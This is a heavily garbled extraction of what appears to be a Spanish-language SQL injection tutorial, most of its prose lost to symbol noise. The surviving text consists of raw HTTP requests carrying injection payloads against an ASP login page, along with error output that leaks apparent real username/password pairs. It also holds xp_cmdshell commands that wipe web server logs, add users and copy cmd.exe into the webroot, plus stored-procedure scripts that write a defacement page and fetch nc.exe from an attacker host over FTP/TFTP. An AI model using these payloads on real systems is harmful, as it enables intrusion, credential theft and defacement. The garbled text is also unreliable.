xxxxxxxxxx=USEREMAIL=rcesar6%40hotmail%2Ecom&CHATNAME=&US
ERFIRSTNAME=roxana&COUNTRYNAME=Argentina; expires=Sun,
16-Mar-2003 05:00:00 GMT;path=/ Cache-control: private
Object Moved
This object may be found here.
:M
"
9 =&
" )" 6
"
+
)
".
> "
"8
> 8
9
" 9 & )
" .
*
)
" .
"
>
>
"
( "
#8%8'; .
E/
"1
F A=4 " 9
"
" !:#; ;;! 1: "
&"
9
"
" "
6
.
"
" "
"
) "
"& 4
6 9
#$%
6
+
E8"
" L.
6 . V 00F
,
*
"
)+
&
"
"
&
.
)
9
9
"
"
9
"
*
,& "
"
9
"
"
"
"
,& "
&
"
"
"
"
+
" "
" "
(
'
"
.
"
"
"1
) & "
*
"8
"
) &
" "
"" . "
9 ;:,:# "
"
#8%8'; .
&
"
"&
"
"
#8%8';
"
+ 9
*
" II 6
"
4
< " #
" "
.
SELECT campo1,campo2,campo3 FROM nom_tbl WHERE campo1=x
AND campo5=y
(
)
=
" ) =
.
*
"+
)
7
"
"
"
E8"
"
>& >
<"
>
?> E, *
"
>#8%8'; _ A : ` a>
"
"
"
"
7
F "
(
. "
"
) "
>
>.
)+> + > 6 .>F "
> + >
2>&
"
9
"
="&"
* )
" "
"
"
"
POST /Login.asp?validar=2 HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg,
image/pjpeg, application/x-shockwave-flash, */*
Referer: http://www.xxxxxxxxxx.com/Login.asp?validar=2
Accept-Language: en-us
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT
5.0)
Host: www.xxxxxxxxxx.com
Content-Length: 297
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: ASPSESSIONIDQQGQQGBW=OBJADBEDBPHAHOMMOCBFNKDA;
xxxxxxxxxx=COUNTRYNAME=Argentina
txtUsuario=Ups%27+union+select+b.name%2C1%2C1%2C1+from+sy
sobjects+a%2C+syscolumns+b+where+a.id%3Db.id+and+a.name%3
D%27usuarios%27+and+b.name+in+%28select+top+01+b.name+fro
m+sysobjects+a%2C+syscolumns+b+where+a.id%3Db.id+and+a.na
me%3D%27usuarios%27+order+by+1+desc%29+order+by+1-&txtPassword=Angel
Y
Y
Y
H
9
6
"
Y
>! ""
>
*
. "
Y
Y
H
+
"L
"
)
& & & *
"+" )4 " & "+"
"
)
V)
VL "
"L
)
E"
)
*
"+" )4 " & "+"
")
V)
VL "
"L
)+
" F
)+ 00
> ">
9
"
"
) "
"
" III H
"&
(
"
+
=
9
"
" # *
"
(
"
.
&
"
"
+
% .
"
1 :1
"
.
+ 9
"
"
"
&
"
"
"
" ) "
""
#S#:-b8';# + #S#':%
1#
"
> ,>
*
9
" )
"
6
(
"
;:! E8 "
"
F %
" "
"
(
1
6
9 "
" 6
"
#8%8';
7 " "& "=
*
9 )
6 "
"
B
4
;:!&
"
"
;:! F
;:,:#
6
!:#;
%
" 9
=
"
"
9
.
)4
)
)
"
"
"
6
"
"
"
.
"
"
" &
Ups' union select b.name,1,1,1 from sysobjects a,
syscolumns b where a.id=b.id and a.name='usuarios' and
b.colorder = 48 -7
"
"
" E!
>F
" >
!
6
"
&
4
4
9
"
"
"
"
4
"
" "
+J
")
"
7
"
.
(
"
4
Microsoft OLE DB Provider for ODBC Drivers error
'80040e07' [Microsoft][ODBC SQL Server Driver][SQL
Server]Syntax error converting the nvarchar value
'UserSubPLUSDate' to a column of data type int.
/Login.asp, line 85
:M& 6
"
:,-' "
" 9
)
# 5 :# " > " # )!% #, > % .
6
".
;:! + " .
)
"+
"
:-
.#
5
".
)
!
#&
&
6
"& "
)
"
&
"
"
&+
" &
) "
"
&
>#
9
)7 "
" " % .
"
D
*
"
"
*
"
#
"
+
" 6 (
9 "
"
) "
) + "
" 9
"
#$% > 1 :1>&
"
6
.
" "
EF> "
# )
"
1 :1
"
"
"
" >) " ">
. 4 #$%&
" 9
" J
" *
"& " )
J
6 " ) "
" !
4
&
"
1 :1& "
"
"
>
" "
"
"
" ) "
"
!
"
EF&
" )
"
7
9
"
*
"
"
J
>&
"
)
.
C
5
9
(
"
"4
;
) "
&
"&
"
".
.
" .
"
"
6
"
" 6
"
4
< +
7
"
+
"
"
*
9
POST /Login.asp?validar=2 HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg,
image/pjpeg, application/x-shockwave-flash, */*
Referer: http://www.xxxxxxxxxx.com/Login.asp?validar=2
Accept-Language: en-us
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT
5.0)
Host: www.xxxxxxxxxx.com
Content-Length: 82
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: ASPSESSIONIDQQGQQGBW=OBJADBEDBPHAHOMMOCBFNKDA;
xxxxxxxxxx=COUNTRYNAME=Argentina
txtUsuario=%27+union+select+sum(UID)%2C1%2C1%2C1+from+usu
arios--&txtPassword=Angel
Y
Y
Y
H
9
6
"
>! ""
>
Y
*
. "
Y
H
+
L
"
" E ,F& & & *
"
"00
6 (
"& .
!:#;
"
<
6
".
4
"
" 6
"
=
6 & )
)4
1
"
"
Microsoft OLE DB Provider for ODBC Drivers error
'80040e07'[Microsoft][ODBC SQL Server Driver][SQL
Server]The sum or average aggregate operation cannot take
a nvarchar data type as an argument.
/Login.asp, line 85
)
"
"
&
9
"
"
I8
, )
)
"
"
,>
9 "
" 6
E>
"
(
" "
&
"
"
"
6
9
6
"
4
4
" "
"
F
1:&
" 9 =
6 :,-'
"
" )
9
( "
6
" "
"
"
"
"
)
& "=
&
+
)
2
"
" 6
" #$% ) "
#$%KK&
"
8
"
"&
"&
"
"
"
"
)
#
"
"
)
"
"
)
" E! "
"
"
"
+
) "
"9 ".
4
6
"
6
&
.
"
""
"& "
.
#$% ! . *
& )" 6
1 &(
!
# 5 :#
6
6
" D
"
"
6
, "
.
)
"
&" *
"& "
"
)4
6
"
" "
" #$%
1 :1& 9
"
"
"
( & ; !: ,8 ,5;: 9
" "
9 "
#$% "
"
(!
*
"
9
9 "
<
="
>#
>
& #$% "
"
"
"
4
"
9
"
<
"
&
6
7
"
"
"
"
"
"
"
"
"
8
"
I
#$%
"
+
"
" 9
1H5 ' 5
" "
) "
" " ! <1
" " !
M
" " %"#
"
" " ,
" " ,
M
" , E1 )
"
"
#
" !G# E'
" D F
"
+
"
"
"
<
"
!
&
"
> > .
>
" E!
.J
&
"
" "&
"
"
)
"
"
)
"
)
"
"
6"
"
>
>&
9 ;:,5 *
"
)4 6 & b 1;5
)
+8
>
.
" ,
&
"
&
9 F
.
.
"
&
""
.
)
6
"
"
EA
7
4
"
+
>5 6
6
"
" 1H5 ' 5
" >9 4
>
#
" 6"
4 # #
"
" " # )!% #,
"
" "
."
,
"
" " ! ) ! *
"
" " ! *
M
"
" " ! * "
"
" " ! <#
"
'
(
"
.
-
"
"
" 4
" F
"
"
.
&9
"
<
' " 5 +
` a>& #$%
&
6
"
"
"
" 4 "
9
"
" "
" 4 "
*
> ,>
8"
*
IIF
"
!
:M&
4
*
*
"
(
" )
"& . "
" +
"
F
"
"
> .
F 9
"
" 9
" .
" " ) "& + " "
*
>86
"&
"
""
"
4
E%
"
9
9 "
+
2
4; !
6 (
" "
" )4
*
"
6 &
#!
!
.
!<
#$%&
!&
(!
(
"
*
(
.
"
>)
6
"
) "
" 7
" 9
"
)
"
=
#
(! , 8 .=
.
"&
. &
"
"9
"
"
A=4 " 9
*
4 . "
"
""
(
7
" " "
!
> $6 3 /
%
#$%
"
*
H 6
.
."
"
6 !:#;
>
*
)
)
.
"
"
"
"
"
) "
)
6
"
*
&
"
(! 6#; !
"
) "
E% 9
"
6
"
"
" *
"6
"
6
"
"
& "
(
*
1;:
9 " .
"
6"
(
F
*
"
" , + !G#
F+6
"
*
9
) =
+
POST /Login.asp?validar=2 HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg,
image/pjpeg,application/x-shockwave-flash, */*
Referer: http://www.xxxxxxxxxx.com/Login.asp?validar=2
Accept-Language: en-us
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT
5.0)
Host: www.xxxxxxxxxx.com
Content-Length: 199
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: ASPSESSIONIDQQGQQGBW=OBJADBEDBPHAHOMMOCBFNKDA;
xxxxxxxxxx=COUNTRYNAME=Argentina
txtUsuario=%27+declare+@aux+varchar%288000%29+set+@aux%3D
%27%27+select+@aux%3D@aux+%2B+UID%2B%27/%27%2BPWS%2B%27%3
B%27+from+usuarios+where+UID%3E@aux+select+@aux+as+aux+in
to+xtmp--&txtPassword=Angel
Y
Y
Y
H
9
6
"
Y
>! ""
>
*
Y
. "
Y
2
H
+
<V
W
<
L
[L L[
<[
-> $6 3 , 8
<6
"[L]L*
.
6 ( "
#8%8';
!
EB
"
"
F"
<VLL "
U
<"
< "
(! 6#; !
"
&
"
)
)
"
(
"
<
+
7
"
POST /Login.asp?validar=2 HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg,
image/pjpeg,application/x-shockwave-flash, */*
Referer: http://www.xxxxxxxxxx.com/Login.asp?validar=2
Accept-Language: en-us
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT
5.0)
Host: www.xxxxxxxxxx.com
Content-Length: 76
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: ASPSESSIONIDQQGQQGBW=OBJADBEDBPHAHOMMOCBFNKDA;
xxxxxxxxxx=COUNTRYNAME=Argentina
txtUsuario=Ups%27union+select+aux%2C1%2C1%2C1+from+xtmp-&txtPassword=Angel
Y
Y
H
9
6
"
Y
>! ""
>
*
Y
. "
Y
H
+
)
"
(
"
*
"L
"
)
"
!:#;
" 4
*
<& & & *
*
<
00
&
"
"
6
*
:,-' 6 6
.)
"
.
" "
Login de Usuarios Registrados
Microsoft OLE DB Provider for ODBC Drivers error
'80040e07'[Microsoft][ODBC SQL Server Driver][SQL
Server]Syntax error converting the varchar value
'Danyr2/pepe;THEMA/M1703;CIELORIANO/daniel;ALELARRAINP/14
05;SANDRA/4484188;0001/13119695;AsdrubalCh/1173;beatrizay
ala/10338154;maria_perez/12345;batv/peresosita;susy/susyk
a;Mireya_Salazar/gabriela;MVidales/male;AngelicaS/chainy;
22
carla/cardie;MonicaA/amorcito;aliciafalcon/baby;dayana/ne
ne;Luz_d/carmen;mguevara/martha;Tiatere1/lima27;CMorena/2
11095;victor...
/Login.asp, line 85
2> $6 3 4! &
!
6 ( )
(
, :!&
"
"
"
"
(! 6#; !
") "
&
"&
"
)
" .
4
".
+
POST /Login.asp?validar=2 HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg,
image/pjpeg,application/x-shockwave-flash, */*
Referer: http://www.xxxxxxxxxx.com/Login.asp?validar=2
Accept-Language: en-us
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT
5.0)
Host: www.xxxxxxxxxx.com
Content-Length: 53
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: ASPSESSIONIDQQGQQGBW=OBJADBEDBPHAHOMMOCBFNKDA;
xxxxxxxxxx=COUNTRYNAME=Argentina
txtUsuario=%27%3Bdrop+table+xtmp--&txtPassword=Angel
Y
Y
Y
H
9
6
"
Y
>! ""
>
*
.
Y
H
+
L]
) <
00
- 6!
;
"
!
"
"
6 " "
"& 9
""
"
"
")
." "
"
"
(
"
.
6
6
" .
)
"9
&"
"
.
" 5
"
"
"9
) "
"
"
*
&
"
"
"
"""
"&
*
&
" "
"
. .
"
$+6 4
H
"
""
!,5;8
4
9
"
"
"
.
"
""
6=
!:#;
+
(
"
23
POST /Login.asp?validar=2 HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg,
image/pjpeg,application/x-shockwave-flash, */*
Referer: http://www.xxxxxxxxxx.com/Login.asp?validar=2
Accept-Language: en-us
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT
5.0)
Host: www.xxxxxxxxxx.com
Content-Length: 103
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: ASPSESSIONIDQQGQQGBW=OBJADBEDBPHAHOMMOCBFNKDA;
xxxxxxxxxx=COUNTRYNAME=Argentina
txtUsuario=%27%3Bupdate+usuarios+set+pws%3D%27NuevoPass%2
7+where+uid%3D%27Carla%27--&txtPassword=Angel
Y
Y
Y
H
9
6
"
Y
>! ""
>
*
Y
. "
Y
H
+
L
"
""
"VL1 6 ! ""L
VL'
L00
+4 4 4
#
&
.
+
9
"
*
"
E5 9
."
9
"
H
"
#$% # 6 F
!:#;
"
&
.
"
*
'delete from usuarios where UID='Usuario'--
+
1 4
$
"
4
"
" "
&
4
1#8 ;& )
&
" "
9 +
" "
"
&
KKKF
9
"&
" "
"
"
"
" 6
.
"
.
=
"
(
"& +
"9
9
6 "
"
)
"
7
.
"
"
&
"
"
)
"
""
")
"
(
" E'
"
&
(
!
. & +
"
4
. 9
=
6
"
9
" "
2?
5"=
"
".
"
&
"
9
=
(
"
.
" )
"
9
<"
" " "
" ) "
&
9
" "
"
!:#; 6=
:)6
7<
*
9 "
+
.
"
"
"+" " "
1#8 ;
*
"
4
"
"
+
&
"
+
&
6
"
"
POST /Login.asp?validar=2 HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg,
image/pjpeg, application/x-shockwave-flash, */*
Referer: http://www.xxxxxxxxxx.com/Login.asp?validar=2
Accept-Language: en-us
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT
5.0)
Host: www.xxxxxxxxxx.com
Content-Length: 113
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: ASPSESSIONIDQQGQQGBW=OBJADBEDBPHAHOMMOCBFNKDA;
xxxxxxxxxx=COUNTRYNAME=Argentina
txtUsuario=%27%3Binsert+into+usuarios+values+%28%27MyUser
%27%2C%27MyPassword%27%29--&txtPassword=Angel
Y
Y
Y
H
9
6
"
Y
>! ""
>
*
Y
. "
Y
H
+
L] "
"
"6
" EL + " L&L +! ""
LF00
% &
"
(
&
!
.
!
.
" 7
"
"
)
" 6"
"
&
<
""
"
"
"
*
6
"*
" >8<
"
#$%
1:
"9
#
!
4
*
"
"
"
*
"
"
!
)
(
"
&
"
.
" * #$% # 6
">
"
"
$
% "
) "
II
.
#
"
"
"
6 "
?4;
<
$
" "
"
"
8< "
"
#0#$%& "
")
" 5
.
" "&
#
" & ,%%L" 9
"
&
*
#0#$% )
<
"
"
")
"
"
"
" <
"&
.
2@
"
"
&
"
5
" <
"
"&
" )
*
)
" *
"
"
"
N Q
"
> ">
4
"
"
"& "
"" "
" < Q
"
"
K6
" ;;!
) "
" "
"
"
4
"
"
"9
"
( =
"
"
""
" "
9 "
"
+ "
"
"
(
6 6= #$%
" ".
"
POST /Login.asp?validar=2 HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg,
image/pjpeg,application/x-shockwave-flash, */*
Referer: http://www.xxxxxxxxxx.com/Login.asp?validar=2
Accept-Language: en-us
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT
5.0)
Host: www.xxxxxxxxxx.com
Content-Length: 90
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: ASPSESSIONIDQQGQQGBW=OBJADBEDBPHAHOMMOCBFNKDA;
xxxxxxxxxx=COUNTRYNAME=Argentina
txtUsuario=Ups%27%3BEXEC+master.dbo.xp_cmdshell%27cmd.exe
+dir+c%3A%27--&txtPassword=Angel
Y
Y
Y
H
9
6
"
Y
>! ""
>
*
Y
. "
Y
H
+
"L]8N8' "
) < Q
"
L
<
L00
:M
9
E
,
)
"
"
"
6
=
)
" *
"
" *
5
" "
)
.
4
"
) 4
"
=
)
&6
6
" " =
"
4
& "
"
"
)" 6
"
* "6
"6
" E8 "
"
"
"F
+
< Q
)
) 4
")
"
>
>
"
"
< Q
(
"
.
"
*
"
"
"*
E/
&
.
&
"
"1
&
9
#5
F
"
"
9
"
" & F
"
"
2
!
"
EXEC master..xp_cmdshell 'dir c:\inetpub\wwwroot\'
! 6
9
6
EXEC master..xp_cmdshell 'type
c:\inetpub\wwwroot\alguna_pagina.asp'
!
"
)
EXEC master..xp_cmdshell 'copy c:\winnt\system32\cmd.exe
c:\inetpub\wwwroot\chroot.exe'
! )
"
EXEC master..xp_cmdshell 'DIR
c:\winnt\system32\logfiles\w3svc1\'
EXEC master..xp_cmdshell 'NET STOP "Servicio de
publicación en
World Wide Web"'
EXEC master..xp_cmdshell 'del
c:\winnt\system32\logfiles\w3svc1\
filelog.log'
EXEC master..xp_cmdshell 'NET START "Servicio de
publicación en
World Wide Web"'
!
6 "
EXEC master..xp_cmdshell 'NET SHARE nombre=drive:path'
!
"
6 G
"
EXEC master..xp_cmdshell 'NET USER username password'
:M&
"
)
.
"
8<
" "
"
.
">&
"
"
"
" #
" >8<
#
"
)7 )
" +
!
">&
"
"
"
"
&
>1
4 "
"
'exec master..sp_addlogin MyUser, MyPass
9
;
"
"
!
"
=
" .
" "
)
6 &"
*
&
.
. "
)
&
"
"
"
"> + >8<
#
!
"> 9
) =
" " ! "
"
" "
"
&
#0#$% # 6
"
*
"
"+" " "
6 "*
"
"
" )
"
9
" " >#
"
"
) "
"*
"
+
"
"
2B
"
"
"
"
"
Q
Q
Q "
Q *.
Q "6
+
)
- $ %+ )
%
"
"
"
4
&
)
*
(
)
Q
.
Q
) "M
Q .
Q .
Q .
M +
& *
"
"
*
+
"
%
"
<
<
<
<
> *
"
+(
9
:,-'F&
"
"
"
322&
9
" # )
7
9
9
<
<
<
<
<
&
"
"
" "
"
"+ 7
'
4
"
&
"
"
" H
"
" .
"
"
"
(
"
"
"
) 4
"
" +
#$%
9
4
>
"& 9
"
"
(
67"
<
#$% E$ +
" #$% 6=
#5& " )
*
" #$%&
) "
""
)
"
& ".
"
.
"
1 &
M
<&
6
Q .
6
Q" 6
Q
"
Q
Q 6
.
&9
4
.
"
>
. (( #
<
" "
" . "* .
"
+
"
.
.
*
+ ;
"
>&
7
"
"
----- Extracto -----------------------------------------[...] La idea es crear una pagina html o asp, si en
el sitio objetivo se encuentra activo y funciónando un
webserver [...]
declare @o int, @f int, @t int, @ret int
exec sp_oacreate 'scripting.filesystemobject', @o out
exec sp_oamethod @o, 'createtextfile', @f out,
'c:\web-hosting\attajdid\index3.html', 1
exec @ret=sp_oamethod @f, 'writeline', NULL,
'<HTML> <HEAD><TITLE>Hola Mundo!!!</TITLE> </HEAD>
<BODY text=black bgColor=#000000> <CENTER> <P><B>'
exec @ret=sp_oamethod @f, 'writeline', NULL,
'<FONT face=Arial color=#b4b58c size=7>Vosotros
</B>Perejil...</B></FONT></P></CENTER> <P><BR><BR>'
exec @ret=sp_oamethod @f, 'writeline', NULL, '<!--" "-></P>
<P></P> <CENTER> <P><B><FONT face=Arial
color=#b4b58c size=7>'
exec @ret=sp_oamethod @f, 'writeline', NULL, 'nosotros
vuestras
</B>WEB<B>s!!!</B></FONT></P></CENTER>
<P><BR><BR></P>'
2C
exec @ret=sp_oamethod @f, 'writeline', NULL, '<DIV
align=center>
<CENTER> <TABLE cellSpacing=0 cellPadding=0
width=100 border=0>'
exec @ret=sp_oamethod @f, 'writeline', NULL, '<TBODY>
<TR>
<TD bgColor=#d20000> </TD></TR>
<TR>
<TD align=middle bgColor=#ffff00>'
exec @ret=sp_oamethod @f, 'writeline', NULL,
'<FONT color=#ffff00
size=1>¡ORTO!<BR>¡¡¡Va
por vosotros!!!
</FONT></TD></TR>
<TR>
<TD '
exec @ret=sp_oamethod @f, 'writeline', NULL,
'bgColor=#d20000>&nbsp
;</TD></TR><!--" "-></TBODY></TABLE></CENTER></DIV> '
exec @ret=sp_oamethod @f, 'writeline', NULL,
'<P><BR><BR><BR><BR><BR></P>'
exec @ret=sp_oamethod @f, 'writeline', NULL, '<P
align=right>
<FONT face="Courier New" color=#00ff00 size=5>
lagear & runlevel</FONT></P>'
exec @ret=sp_oamethod @f, 'writeline', NULL, '<P
align=right>
<FONT face="Courier New" color=#00ff00
size=4>Recuerdos a
<B>N</B>9<B>Team</B></FONT>'
exec @ret=sp_oamethod @f, 'writeline', NULL, '</P> <P
align=right>
<FONT face="Courier New" color=#00ff00 size=3>'
exec @ret=sp_oamethod @f, 'writeline', NULL, 'Donde te
podemos
encontrar BreakICE?</FONT></P> <FONT color=black>"
</FONT>
</BODY></HTML>'
Para subir archivos.- Creamos un archivo get.txt para
utilizar luego ftp
declare @o int, @f int, @t int, @ret int
EXECUTE sp_oacreate 'scripting.filesystemobject', @o out
EXECUTE sp_oamethod @o, 'createtextfile', @f out,
'c:\get.txt', 1
EXECUTE @ret=sp_oamethod @f, 'writeline', NULL, 'guest'
EXECUTE @ret=sp_oamethod @f, 'writeline', NULL, 'guest'
EXECUTE @ret=sp_oamethod @f, 'writeline', NULL, 'user
anonymous'
EXECUTE @ret=sp_oamethod @f, 'writeline', NULL, 'guest'
EXECUTE @ret=sp_oamethod @f, 'writeline', NULL, 'get
nc.exe'
EXECUTE @ret=sp_oamethod @f, 'writeline', NULL, 'quit'
EXECUTE master.xp_cmdshell 'FTP -s c:\get.txt
NUESTROHOST'
o algo mas fácil si tenemos un tftp en nuestro host
EXECUTE master.xp_cmdshell 'TFTP -i NUESTROHOST GET
c:\mi_local_file c:\remote_file'
3
----- Extracto -----------------------------------------:M&
)
)4 "
6 " *="
" "
"
"
# 6
"
.
E
.
" 9
" 8
"
4
"
.
& ) "
" "
"
(
" *
"
6" "
#0#$% # 6 &
")
"
.
"
" &"
" Q
+" Q
9
"
"
)4 :%8
"
" * #$%
"
. * "+"
)4 F +
"
7
"
)4 6
" )
"
"
;
" Q
. &c " &
M : ;! ;
< a
)4
`&
;
" Q
)4
`&
6
`&`
`
aa
M &
: ;! ; a
Va
"
3
# )
"
" ) "
9
7
9
&
"IF
*
)
5
*
+
"
7"
6
"
"
&9
"&
"
6"
"
"
"
.
" D
"
)
+ =
" &
J
" "
"
)
)
"
"
*
"
"
>;
""
"
" ) " "
& "
+
"
. &"
7
"
"
:
.
"
"
G )5
"
"
"
L 1;: : ;A %8L
>
>
+ =
"
"+ )
&
+
#$%
9 6
)
<"
6
"
( " E: ) =
"
*
" " "
#$% +
"
)
#
"
"
+! 4 >
"
"
#$% 4
*
#
'
%
#0#$%
)
.
") " "
0
,
"
"9
9 "
.J
#$% 4
) 4
"
! "
` : ;! ; a
= "
"
J
""
"
+
3
03 !
# )"
" ") "
1 :1 " )
H
"
1 "
J
"
""
0 +,# )"
" ") "
1 :1 " )
!
"5
1 "
J
" E *Q* KF
"
"
""
"
"
F
0$ .
#
':!S E8 "
# )"
" ") "
1 :1 " )
!
"5
J
""
""
"
" ) "K
0
# )"
" ") "
1 :1 " )
!
"5
"
J
""
""
" ) "K
"
" ""
"
E< Q
"
&" Q
" F
"@ %
"
*
&
A
.
*
7
"
'
"
" .
.
" .
"
&
9
"
& "
4
"
&
"& "
7 . "
6
7 . "
6
"
.
*
%
"
"
" *
" 6
"
)
"
"
"
"
".
(
#0#$%
"
"
"
"
"
"
" "
(
"
(
&
")
6
"
)
)
# 6
" " 6
"
"
"9
" J
" " 6
" ) "
"
"9
!
4 *="
" "" 6
8" ) (
! =
'
(
# *
*
"
"
<
+
" ;'! 322 + ,! 323F
1
"
" 6
" )
"
" 6
1
"
"
=
& "
"
"
"
! M
""
""
6
"
A
" 6=
"
"
) "
=
" 8"
"
6
#$% " 6
3
! " " "
.
" .
*
.
E,
" 6
"
) "
""
" . ( &
M"
)
*.
F
H *9
6
"
"
"
"
"
#0#$% # 6
8" ) (
"
6 . "
"& " )
"
" 9
(
" "
"
"
8" ) (
6 "
" .
6
"
* "
*
E
"
"
" .
) 0
"
"
"
*
(
"
M
" "
MF
8" ) (
""
*
#5
# "
9
" .
&
" "
"
*
"
."
6
#0#$%
6 '
1
4
)
) "
"
6
" "
"
"
" "
.
"
(
"
.
" H
6 )
"
"
) "
" ' 9 "
"
"
"
" "
"
"
" >$
> "
"
" 9
" " .
) "
"
"A %
B
#0#$% # 6
"
6 "
" 6
" .
&
9
.
6 (
"
" "
"
'
"
6
" .
6
8
!
"
"
.
9
"
"
*
"
& +" ")
" 7
" +
" " *
" "
"
") " "
" ) + +"
(
"
"
"
) 4
"
6 " " " .
"
&
"
"
+
"
""
") " & ")
<
M ." )
#0#$% # 6
"
"
6 & <"
"9
"
"
+ "*
"
" +# 6 "!
" )
"
"&
6 "
" .
G
"
" "
"
" . > +
"
"
"
) = 6 " #$% 4
# )
*
"
"
*
M .
*
"
"*
"&
"
"
) =
"
.
6
)
"
)
" " " "
" . (
# #;8 5 G
"
.
(
M"
".
"
)
"
.
"
""
" 9
" ) "
+ = "
7<
" +
"
"
8
" G
"
""
"+
"
"
"
"
6 " E;
"
"
9
"
"
"
" 7
"
"
"
"&
6
"
"
"&
.
" .
6"
"
" .
"
"
" . "&
" "A
= &
*.
" ""
* "
*
& " )
"" 6
>
.= " )
"
)
"
*=
4
& 74
.
"
&
"
&
"
*
"
"
#0#$%F 8"
. " D " ". *
)
32
'
6
G
"
2& + "
" ")
"9
" "
"
" )
"
" " .
E5
(
" 5
"& ,
6 " # .
& 8A#& F "=
)7
%81;:
" *
"
( " "
"
"
* & "
"
9
".
)
"
"
#0 #& #0#$%& # "
" 8 !&
"
"
)
( "
*
&
"
.
&+
9
#:- 8 " "
6
5
"
"
"
9
#
"
9
+
" " "
"
"
6 " .
6"
"
"
"
"& +
5 " >5 . !
"C
)
"
+ " 6
"
"
"
"
>
"
*
7
" + %
" 9
"
#
M . 8< "
M
.
"9 "
7
" #$%
" '
"
<
% & ! &
G
"
> E #-1 B303B 022CB0@F
M
"
Q QG
"
"9 "9 Q 3
+
" *
"9 6
6 " +
"
+
"
" #$% 4
G
!
*
"
"
"
.Q#$%Q# 6 Q " .Q#$%Q 4
*
< . ""
" 6
Q"9 Q 4
*
< . ""
"
Q 6
Q"9 Q 4
*
< . ""
" 0#$%
*
< . ""
"
M .0"9 0 ""
" *
< . ""
"6
.Q
) " Q"
+ *
"
"
+ 6 " ?,! 1 ! @8
"
. "
Q6
"9 "
"
"D
!
M "
M "
M
"
"
<
+
+
*
.'
"
M M
M " #9 )* (
+9
"
" 5
&
>
*
- M >
"
"
"*
4
" )
&
">
<
6
6
33
M
M
M
M
"
"
"
"
<< "
"
"
"
"
"
+ . 1; "
" #9 M (
+ . G "9
<
+ . G "9
.(
+ +
. )5
"0 0 @0) (
"
"*
"
"
" M
+
"B
01
0
0'
0S
"
"
, :!
"9
" . II )+ 5 .
' % . "
"
" *
" )
")
"I )+ 5 .
6.
8
"
*
* "
*
"
)+ 1
F )+
"
59 =
. &
" 6 =
"
.
"
= &+9
.
"
)
9
"
" .
D
. &
.
1
"
(
+
.
6
"
"
" "
"
"
"
. (( #
+ ;
>
> < 1
)
" )
"
"
"
+
9
"
")
6
9
9
"
"
" " "6 "
"* (
"
" ") ( "
9
"
"
"
(
&
9
" *
"9
"
"&
" < ") " ""
"
"
"
"
"
"
"
)7
. "
"
/
"
"
6
" *
" *
;
"
&
=
"
"
MQJ
% ! (
(
**
= "
.
"
"
;
"
"
/
!
9
"
#
& .
" " "
5 " >5 . !
=
#0#$%&
"9
+
67"
"
+# *
"
" .
" "
#$% 4
% d
" "
"
*
>
9
"
&
# 9
. "
"
E8"
"
"
"
"
.
"J
. "
<"
" "
" " .
"KF
"
"
9 D
"
+*
O1 <
Documentos relacionados
CEMPANEL IMAGE
CEMPANEL IMAGE
Comunicación fín de Obra
Comunicación fín de Obra
XXXXXXXXXXXXXXXXX XXXXXXXXXX XXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXX XXXXXXXXXX XXXXXXXXXXXXXXXXX
Formato Constitución Iglesia - Secretaría de Derechos Humanos
Formato Constitución Iglesia - Secretaría de Derechos Humanos
NOTA INFORMATIVA Para conocer los requisitos establecidos por
NOTA INFORMATIVA Para conocer los requisitos establecidos por
XXXXXXXXXXXX XXXXXXXXXXXXXXX XXXXXXXXXX
XXXXXXXXXXXX XXXXXXXXXXXXXXX XXXXXXXXXX
Certificado de tipicidad para vinos con niveles superiores de cloruros y/o sulfatos
Certificado de tipicidad para vinos con niveles superiores de cloruros y/o sulfatos
EL SUSCRITO REPRESENTANTE LEGAL
EL SUSCRITO REPRESENTANTE LEGAL
CONTAR VESCULAS DE CLULAS DE IMGENES DE 3D
CONTAR VESCULAS DE CLULAS DE IMGENES DE 3D
6-CARTEL MODIFICABLE INDUSTRIA - IMPRENTA JULIO`16
6-CARTEL MODIFICABLE INDUSTRIA - IMPRENTA JULIO`16
Descargar
Anuncio
Anuncio